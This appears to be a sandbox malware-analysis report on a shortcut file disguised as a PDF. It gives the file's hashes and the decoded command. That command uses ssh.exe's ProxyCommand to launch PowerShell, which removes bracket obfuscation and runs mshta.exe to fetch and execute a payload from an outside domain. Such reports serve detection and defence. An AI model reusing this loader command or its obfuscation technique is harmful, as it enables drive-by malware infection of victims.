|
Hash | Hash Value |
|---|---|
| MD5 | a3cf7c78d143162733c64741467b5b90
|
| Sha1 | 2e46ae7501bf5921802c4e122fea038332d61741
|
| Sha256 | 39fcf6143a801de8acba009ef69ac4f7b533d8e1b91337547ca578f2b7117534
|
| Sha384 | 5ac07dcbe4cecd886497d07e483347e9cdc57b9354ee38911a51d2a55000ffa6611a607af21bc54beb384f0d4a53670d
|
| Sha512 | f85b1573f0005bc8b476a487b7d8ee87f6ebf66a2fecd8221b51d6e1b1ea9da5333ea932297094ab611eb073422f61baf57711f021d5b38d31fbdd6e6b366b1e
|
| SSDeep | 24:8lj/BF//Z/Udt1v+/+GnWbUk9r9AAlnE3ek489+dd79dsHhWUIeFIU:81LZwGnaUk9Jm3ekJ9+dJ9Z5W
|
| TLSH | E04165046BEA072DF3B36F729876A660B43B7C45EEA1DB0E0043418C1436A24D4B5F77
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | ssh.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')" . |
| Deobfuscated PowerShell | "mshta.exe https://berb.fitnessclub-filmfanatics.com/z.mp4" " ." |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | ssh.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')" . Malicious |
Instruction_695-18121-002_Rev.PDF.lnk.bin |
| Deobfuscated PowerShell | "mshta.exe https://berb.fitnessclub-filmfanatics.com/z.mp4" " ." Malicious |
Instruction_695-18121-002_Rev.PDF.lnk.bin > LNK CommandLine > [PowerShell Command] |